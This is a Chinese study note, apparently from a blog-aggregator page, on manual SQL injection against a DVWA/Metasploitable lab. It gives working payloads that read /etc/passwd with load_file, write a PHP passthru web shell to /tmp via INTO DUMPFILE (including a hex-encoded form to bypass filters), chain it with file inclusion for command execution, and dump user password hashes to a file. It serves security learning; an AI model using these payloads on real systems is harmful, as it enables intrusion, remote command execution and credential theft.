2. 程式人生 > >Kali學習筆記40:SQL手工註入(2)

Kali學習筆記40:SQL手工註入(2)

阿新 發佈:2019-02-11
set 找到 Suite 雙引號 127.0.0.1 但是 int ava 成功

上一篇講到可以通過註入得到數據庫中所有的表信息

而SQL註入能不能做數據庫之外的事情呢?

讀取文件:

‘ union select null,load_file(‘/etc/passwd‘) --

技術分享圖片

為了方便進行測試,後邊我使用Burpsuite

既然可以讀取文件了,那麽也就可以寫文件:比如經典的PHP一句話

‘ union select null,"<?php passthru($_GET[‘cmd‘]);?>" INTO DUMPFILE "/var/www/a.php" --

技術分享圖片

結果是無法寫入文件,這是什麽原因呢?

我猜測是目錄權限的問題

於是去掉/var/www

‘ union select null,"<?php passthru($_GET[‘cmd‘]);?>" INTO DUMPFILE ‘a.php‘ --

技術分享圖片

成功,所以得出應該是目錄問題

首先我們看一下上傳成功的文件在哪個目錄:

技術分享圖片

發現在/var/lib/mysql/dvwa下存放

技術分享圖片

查看後發現屬主和屬組是Mysql,其他用戶無法訪問,甚至mysql組其他用戶都沒有權限

然後我們以root的身份進入dvwa目錄查看a.php

技術分享圖片

那麽我們就沒有辦法把這一句話PHP文件寫入到指定位置了嗎?

我們可以結合以前提到的文件包含漏洞,寫入通用目錄/tmp/,最終達到命令執行

實現:

寫入:註意這裏的單雙引號

‘ union select null,"<?php passthru($_GET[‘cmd‘]);?>" INTO DUMPFILE "/tmp/a.php" --

然後利用文件包含漏洞:

技術分享圖片

最終成功!

所以SQL註入寫文件,是以mysql用戶寫入的,所以可以采用中間目錄的方法,然後結合其他漏洞完成命令執行

如果目標系統管理員的權限配置不當,那麽只要能夠SQL註入,就可以直接拿到shell

既然可以上傳一句話PHP,那麽也可以上傳反彈連接PHP腳本

找到Kali自帶的PHP反彈連接腳本,重命名為b.php,利用xxd轉換為十六進制

由於服務器通常會過濾<?以及換行符,我們再使用tr去除換行符

技術分享圖片

得到一堆16進制,復制出來,替換位置(1)

‘ union select null,(0x(1)) INTO DUMPFILE "/tmp/b.php" --

發送之後,理論上會成功,但是由於URL過長,報錯

技術分享圖片

可以換一個小木馬,甚至就使用剛才的a.php

‘%20union%20select%20null,%20(0x3c3f70687020706173737468727528245f4745545b27636d64275d293b3f3e)%20INTO%20DUMPFILE%20"/tmp/b.php"%20--%20

進行URL編碼後就是上邊的結果:註意(0x之前必須加一個空格

技術分享圖片

在metasploitable中查到了,實際上就是剛才的a.php內容,但是我們使用十六進制編碼繞過了過濾

驗證命令執行:

技術分享圖片

成功!

有時候,數據庫的內容太多,我們不可以在一個頁面中觀看

所以考慮如何直接把數據庫下載下來

‘ union select null,concat(user,0x3a,password) from users INTO OUTFILE "/tmp/a.db" --

查看:

技術分享圖片

擴展:一個思路

我們甚至可以直接給目標開發一個功能:自定義一個表單,輸入信息,然後在數據庫插入信息

 ‘ union select null,‘<?php if(isset($_POST["submit"])) { $userID = $_POST["userID"]; $first_name
= $_POST["first_name"]; $last_name = $_POST["last_name"]; $username =
$_POST["username"]; $avatar = $_POST["avatar"]; echo "userID: $userID<BR>"; echo
"first_name: $first_name<BR>"; echo "last_name: $last_name<BR>"; echo "username:
$username<BR>"; echo "avatar: $avatar<BR>";
$con=mysqli_connect("127.0.0.1","root","","dvwa"); if (mysqli_connect_errno()) { echo
"Failed to connect to MySQL: " . mysqli_connect_error(); } else { echo "Connected to
database<BR>"; } $password = "123"; $sql="insert into dvwa.users values (\\"$userID\\",\"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\")"; if (mysqli_query($con,$sql)) { echo "[Successful Insertion]: $sql"; } else { echo "Error
creating database: " . mysqli_error($con); } mysqli_close($con); } ?> <form method="post"
action="<?php echo $_SERVER["PHP_SELF"]; ?>"> <input type="text" name="userID"
><br> <input type="text" name="first_name"><br> <input type="text"
name="last_name"><br> <input type="text" name="username"><br>
<input type="text" name="avatar"><br> <input type="submit" name="submit"
value="Submit Form"><br> </form>‘ INTO DUMPFILE "/tmp/user.php" --

然後利用文件包含漏洞,即可利用

這種方式實際上並沒有成功,不過可以作為一個思路

Kali學習筆記40:SQL手工註入(2)

相關推薦

Kali學習筆記40SQL手工2

set 找到 Suite 雙引號 127.0.0.1 但是 int ava 成功 上一篇講到可以通過註入得到數據庫中所有的表信息 而SQL註入能不能做數據庫之外的事情呢? 讀取文件: ‘ union select null,load_file(‘/etc/passwd

Kali學習筆記30手動Web漏洞挖掘2

文章的格式也許不是很好看,也沒有什麼合理的順序 完全是想到什麼寫一些什麼,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道   實驗環境: Kali機器:192.168.163.132 Metasploitable靶機:192.168.163.129  

《C語言程式設計現代方法2K.N.King 著學習筆記C語言基本概念2

2.3 註釋 每一個程式都應該包含識別資訊,即程式名、編寫日期、作者、程式的用途以及其他相關資訊。C語言把這類資訊放在註釋(comment)中。 符號 /* 標記註釋的開始,而符號 */ 則標記註釋

《Microsoft SQL Server 2008 Analysis Services Step by Step》學習筆記使用帳戶智慧

導讀:本文介紹如何使用賬戶智慧(Account Intelligence) 本文末尾提供兩個專案原始碼:AdventureWorks_BI_Begin5和AdventureWorks_BI_End5,顧名思義,開始和完成。另外,包括資料庫檔案SSAS2008SBS_Da

《C語言程式設計現代方法2K.N.King 著學習筆記C語言基本概念3

2.5 讀入輸入 為了獲取輸入,就要用到 scanf 函式。它是C函式庫中與 printf 相對應的函式。scanf 中的字母 f 和 printf 中的字母 f 含義相同,都是表示“格式化”的意思

《C語言程式設計現代方法2K.N.King 著學習筆記C語言基本概念4

2.7 識別符號 在編寫程式時,需要對變數、函式、巨集和其他實體進行命名。這些名字稱為識別符號(identifier)。在C語言中,識別符號可以含有字母、數字和下劃線,但是必須以字母或者下劃線開頭。

《C語言程式設計現代方法2K.N.King 著學習筆記C語言基本概念5

問與答 GCC 最初是 GNU C Compiler 的簡稱。現在指 GNU Compiler Collection,這是因為最新版本的 GCC 能夠編譯用 Ada、C、C++、Fortran、Ja

深度學習筆記多層感知機MLP與神經網路結構

為了儘量能形成系統的體系,作為最基本的入門的知識,請參考一下之前的兩篇部落格: 神經網路(一):概念 神經網路(二):感知機 上面的兩篇部落格讓你形成對於神經網路最感性的理解。有些看不懂的直接忽略就行,最基本的符號的記法應該要會。後面會用到一這兩篇部落格中

SQL一般

current csrf 註入 ascii ati cookie ble true () mysql一般註入(二) 1.mysql一般註入(insert、update) mysql一般請求mysql_query不支持多語句執行,mysqli可以。   inse

數字語音訊號處理學習筆記——語音訊號的同態處理2

版權宣告:本文為博主原創文章,未經博主允許不得轉載。    https://blog.csdn.net/u013538664/article/details/34235403 5.4 復倒譜和倒譜 定義      

tensorflow學習筆記之使用tensorflow進行MNIST分類2

接著上一篇:http://blog.csdn.net/IEEE_FELLOW/article/details/53012351 本文參考Yann LeCun的LeNet5經典架構,稍加ps得到下面適用於本手寫識別的cnn結構,構造一個兩層卷積神經網路,神經網路的結構如下圖

Kali學習筆記5TCPDUMP詳細使用方法

CA 自己 ring int 十六 一行 全部 kali info Kali自帶Wireshark,但一般的Linux系統是不帶的,需要自行下載,並且過程略復雜 而純字符界面的Linux系統無法使用Wireshark 但是,所有Linux系統都會安裝TCPDUMP:一種基於

Kali學習筆記7SHODAN搜索引擎

isp Go 6.2 www. image try 域名 主機 httpd SHODAN搜索引擎不像百度谷歌等,它們爬取的是網頁,而SHODAN搜索的是設備。 物聯網使用過程中,通常容易出現安全問題,如果被黑客用SHODAN搜索到,後果不堪設想。 網站:https://

Kali學習筆記11nmap在二層發現中的應用

clas conf DC echo broadcast col 9.png ace arping nmap在二層發現中的使用: nmap只需要一行即可實現arping的一個腳本:並且速度更快 #!/bin/bash if [ "$#" -ne 1 ];then ec

Kali學習筆記13Scapy在二層發現中的使用

發送 kali 文件 查詢 一個 mac地址 調用函數 學習筆記 開啟 直接輸入scapy,發現丟失文件或者有錯誤 這時候,輸入這行即可: 耗時不多,發現下載完成之後就可以正常開啟scapy了! 簡單使用方式:就像調用函數的方式: 示例:這裏我要定制一個ARP數據

Kali學習筆記10端口掃描詳解

repl .com pan pytho format www. run 筆記 inf 上一篇先是介紹了UDP的端口掃描,又談了TCP的不完全連接端口掃描 https://www.cnblogs.com/xuyiqing/p/9389276.html 接下來我們看看TCP的全

Kali學習筆記11僵屍掃描案例

runtime spa level rbo lag 端口開放 ref zomb evel 什麽是僵屍掃描?本質也是端口掃描,不過是一種極其隱蔽的掃描方式 所以幾乎不會被發現,不過也有著很大缺陷:掃描條件很高 首先需要有一臺僵屍機,這裏我找好一臺win10僵屍機器,IP地

Kali學習筆記13操作系統識別

mage 系統識別 ble 操作 沒有 esp xxx turn 類型 為什麽要掃描操作系統呢? 其實和上一篇博客:《服務掃描》類似,都是為了能夠發現漏洞 發現什麽漏洞? 不同的操作系統、相同操作系統不同版本,都存在著一些可以利用的漏洞 而且,不同的系統會默認開放不同的

Web安全學習筆記(八)SQL-結構化查詢語言

.com 時也 create 取數據 數據操作 date 簡單的 esc 標準 SQL概述: 結構化查詢語言(Structured Query Language)簡稱SQL,是一種特殊目的的編程語言,是一種數據庫查詢和程序設計語言,用於存取數據以及查詢、更新和管理關系數據庫

Kali學習筆記25Arachni使用實現分散式掃描

文章的格式也許不是很好看,也沒有什麼合理的順序 完全是想到什麼寫一些什麼,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道   Arachni不同於上次介紹的nikto和skipfish 是一個Web介面的一個Web掃描器 Arachni的強大不必多說: 國際知名